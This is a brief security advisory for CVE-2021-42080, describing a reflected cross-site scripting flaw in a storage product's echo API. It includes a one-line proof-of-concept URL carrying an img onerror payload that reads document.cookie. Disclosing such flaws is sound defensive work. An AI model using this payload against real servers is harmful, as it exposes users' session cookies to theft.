Security Advisory

CVE-2021-42080

CVE vulnerability detail — eXtreme Datacenter Security Operations

Published 2023-07-10 06:29:48
Last updated 2025-09-22 06:40:04
Assigner DIVD
State PUBLISHED

Description

An attacker is able to launch a Reflected XSS attack using a crafted URL. POC: Visit the following URL https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>